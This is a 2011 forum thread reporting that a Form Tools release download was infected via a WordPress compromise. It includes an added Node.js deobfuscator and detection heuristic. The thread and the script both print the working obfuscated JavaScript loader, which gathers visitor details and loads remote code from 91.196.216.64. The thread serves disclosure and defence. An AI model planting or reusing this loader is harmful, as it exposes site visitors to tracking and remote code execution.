Download of latest version infected - Printable Version
+- Form Tools (https://forums.formtools.org)
+-- Forum: Form Tools (https://forums.formtools.org/forumdisplay.php?fid=1)
+--- Forum: Installation (https://forums.formtools.org/forumdisplay.php?fid=4)
+--- Thread: Download of latest version infected (/showthread.php?tid=1805)

Download of latest version infected - __diz__ - Dec 9th, 2011

Hi Ben

Please check the latest download of formtools. It is infected with an encoded javascript. I guess it has happened through Wordpress during the last two days. The version from 6.12. that I downloaded was also not infected. You can check within the archive, e.g. formtools\global\codemirror\js\tokenizejavascript.js. In this (and others) you will find:

var _0xdc8d=["\x73\x63\x5F\x63\x6F","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x63\x6F\x6C\x6F\x72\x44\x65\x70\x74\x68","\x77\x69\x64\x74\x68","\x68\x65\x69\x67\x68\x74","\x63\x68\x61\x72\x73\x65\x74","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x72\x65\x66\x65\x72\x72\x65\x72","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x69\x64","\x73\x72\x63","\x68\x74\x74\x70\x3A\x2F\x2F\x39\x31\x2E\x31\x39\x36\x2E\x32\x31\x36\x2E\x36\x34\x2F\x73\x2E\x70\x68\x70\x3F\x72\x65\x66\x3D","\x26\x63\x6C\x73\x3D","\x26\x73\x77\x3D","\x26\x73\x68\x3D","\x26\x64\x63\x3D","\x26\x6C\x63\x3D","\x26\x75\x61\x3D","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];element=document[_0xdc8d[1]](_0xdc8d[0]);if(!element){cls=screen[_0xdc8d[2]];sw=screen[_0xdc8d[3]];sh=screen[_0xdc8d[4]];dc=document[_0xdc8d[5]];lc=document[_0xdc8d[6]];refurl=escape(document[_0xdc8d[7]]);ua=escape(navigator[_0xdc8d[8]]);var js=document[_0xdc8d[10]](_0xdc8d[9]);js[_0xdc8d[11]]=_0xdc8d[0];js[_0xdc8d[12]]=_0xdc8d[13]+refurl+_0xdc8d[14]+cls+_0xdc8d[15]+sw+_0xdc8d[16]+sh+_0xdc8d[17]+dc+_0xdc8d[18]+lc+_0xdc8d[19]+ua;var head=document[_0xdc8d[21]](_0xdc8d[20])[0];head[_0xdc8d[22]](js);} ;

The script will be decoded and try to connect to a Russian server. I have decoded it to:

["sc_co","getElementById","colorDepth","width","height","charset","location","referrer","userAgent","script","createElement","id","src","http://91.196.216.64/s.php?ref=","&cls=","&sw=","&sh=","&dc=","&lc=","&ua=","head","getElementsByTagName","appendChild"]

I don't know exactly what the script does. It is evident that it is trying to contact http://91.196.216.64, perhaps to reload code. This does also happen on your site. Useful information can be found at: http://dan.cx/blog/2011/11/pulling-apart-wordpress-hack

Please check!!

Regards
Dirk

RE: Download of latest version infected - Ben - Dec 9th, 2011

Hi Diz,

Thank you SO much for reporting this. I took everything offline this morning and I'm still investigating. That link you posted does help a little, but the actual source of the hack is different. It's definitely a Wordpress-related flaw, but I haven't been able to identify where it originally stems from on my site: the PHP code they mention isn't anywhere to be found.

I'll post more when I know something more concrete.

- Ben

RE: Download of latest version infected - Ben - Dec 9th, 2011

Hi Dirk,

I've made a post outlining the problem, why it happened, who's affected and how to fix: http://www.formtools.org/wordpress/?p=599

I'm going to be spending the next few days examining every last nook and cranny of the site (as well as replacing my Wordpress installation with a totally new one) to prevent this from happening again.

- Ben

RE: Download of latest version infected - __diz__ - Dec 10th, 2011

Hi Ben

I'm glad that I could help. Formtools is a very stable and innovative tool. Such a hack can happen to everybody handling php on his site and has nothing to do with Formtools itself as a script. As I can see, you have investigated in detail and taken very quick action to inform the users. That's not self-evident for every developer.

All webmasters who use active scripts must always have an eye on security, so don't worry too much about the inconvenience you might have caused. Thanks for your information and actions.

Kind Regards
Dirk

(Dec 9th, 2011, 2:07 PM) Ben Wrote: Hi Dirk,
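The decoding Dirk did by hand above (turning the `\xNN` string table back into plain text and reading off what each `_0xdc8d[n]` reference stands for) can be automated, which is useful when checking every file in an extracted archive rather than one. The following Node.js script is an added example written for this page; it is not code from the thread or from Form Tools. It embeds the exact snippet Dirk quoted as its sample input, decodes the string table, rewrites the indexed references into readable property accesses and string literals, lists any URLs the table contains, and exposes a simple `looksObfuscated` heuristic (hex-escaped `_0x…` string table) that a webmaster could run over a download before deploying it. The function names and the threshold in the heuristic are the author's own choices, not anything from the thread.

```javascript
// Added example: deobfuscate the "hex-escaped string table" pattern from the
// injected script Dirk posted, and flag files that carry the same pattern.
// Run with: node deobfuscate.js

const HEX_ESCAPE = /\\x([0-9a-fA-F]{2})/g;

// Turn "\x73\x63" style escapes into plain characters.
function decodeHexEscapes(s) {
  return s.replace(HEX_ESCAPE, (_, hh) => String.fromCharCode(parseInt(hh, 16)));
}

// Locate `var _0xNNNN=["...","..."];` and return { name, table, rest }, where
// `rest` is the code that follows the table. Returns null if no table is found.
function extractStringTable(src) {
  const m = src.match(/var\s+(_0x[0-9a-fA-F]+)\s*=\s*\[((?:"(?:[^"\\]|\\.)*"\s*,?\s*)*)\]\s*;/);
  if (!m) return null;
  const table = [];
  const strRe = /"((?:[^"\\]|\\.)*)"/g;
  let s;
  while ((s = strRe.exec(m[2])) !== null) table.push(decodeHexEscapes(s[1]));
  return { name: m[1], table, rest: src.slice(m.index + m[0].length) };
}

const IDENT = /^[A-Za-z_$][\w$]*$/;

// Rewrite obj[_0xNNNN[i]] as obj.name and a bare _0xNNNN[i] as a string literal,
// so the control flow of the script can be read directly.
function deobfuscate(src) {
  const parsed = extractStringTable(src);
  if (!parsed) return { table: [], code: src, urls: [] };
  const { name, table, rest } = parsed;
  // Names match _0x[0-9a-fA-F]+, so they contain no regex metacharacters.
  let code = rest.replace(new RegExp(`\\[${name}\\[(\\d+)\\]\\]`, 'g'), (whole, i) => {
    const v = table[Number(i)];
    if (v === undefined) return whole;
    return IDENT.test(v) ? `.${v}` : `[${JSON.stringify(v)}]`;
  });
  code = code.replace(new RegExp(`${name}\\[(\\d+)\\]`, 'g'), (whole, i) => {
    const v = table[Number(i)];
    return v === undefined ? whole : JSON.stringify(v);
  });
  const urls = table.filter((v) => /^https?:\/\//.test(v));
  return { table, code, urls };
}

// Heuristic for scanning files: a `_0x…=[` string table made mostly of
// hex escapes. The threshold of 20 escapes is an arbitrary choice for this example.
function looksObfuscated(src) {
  const escapes = (src.match(HEX_ESCAPE) || []).length;
  return /_0x[0-9a-fA-F]+\s*=\s*\[/.test(src) && escapes >= 20;
}

// Sample input: the snippet quoted in the thread above, verbatim. String.raw keeps
// the backslashes so the \x escapes reach the decoder untouched.
const SAMPLE = String.raw`var _0xdc8d=["\x73\x63\x5F\x63\x6F","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x63\x6F\x6C\x6F\x72\x44\x65\x70\x74\x68","\x77\x69\x64\x74\x68","\x68\x65\x69\x67\x68\x74","\x63\x68\x61\x72\x73\x65\x74","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x72\x65\x66\x65\x72\x72\x65\x72","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x69\x64","\x73\x72\x63","\x68\x74\x74\x70\x3A\x2F\x2F\x39\x31\x2E\x31\x39\x36\x2E\x32\x31\x36\x2E\x36\x34\x2F\x73\x2E\x70\x68\x70\x3F\x72\x65\x66\x3D","\x26\x63\x6C\x73\x3D","\x26\x73\x77\x3D","\x26\x73\x68\x3D","\x26\x64\x63\x3D","\x26\x6C\x63\x3D","\x26\x75\x61\x3D","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];element=document[_0xdc8d[1]](_0xdc8d[0]);if(!element){cls=screen[_0xdc8d[2]];sw=screen[_0xdc8d[3]];sh=screen[_0xdc8d[4]];dc=document[_0xdc8d[5]];lc=document[_0xdc8d[6]];refurl=escape(document[_0xdc8d[7]]);ua=escape(navigator[_0xdc8d[8]]);var js=document[_0xdc8d[10]](_0xdc8d[9]);js[_0xdc8d[11]]=_0xdc8d[0];js[_0xdc8d[12]]=_0xdc8d[13]+refurl+_0xdc8d[14]+cls+_0xdc8d[15]+sw+_0xdc8d[16]+sh+_0xdc8d[17]+dc+_0xdc8d[18]+lc+_0xdc8d[19]+ua;var head=document[_0xdc8d[21]](_0xdc8d[20])[0];head[_0xdc8d[22]](js);} ;`;

const RESULT = deobfuscate(SAMPLE);
console.log('flagged:', looksObfuscated(SAMPLE));
console.log('string table:', RESULT.table);
console.log('contacted URLs:', RESULT.urls);
console.log('readable code:\n' + RESULT.code);
```

The rewritten code reads as `element=document.getElementById("sc_co"); if(!element){ ... js.src="http://91.196.216.64/s.php?ref="+refurl+"&cls="+cls+... ; document.getElementsByTagName("head")[0].appendChild(js); }`, which matches Dirk's reading: if no element with id `sc_co` exists yet, the script builds a `<script>` tag whose source is the remote server, passing referrer, screen size, colour depth, charset, location and user agent as query parameters, and appends it to `<head>` so whatever that server returns is loaded and executed. The `sc_co` check simply stops the loader from injecting itself twice. For a directory sweep, read each `.js` file and run `looksObfuscated` on its contents; files that match are candidates for comparison against a clean copy of the same release.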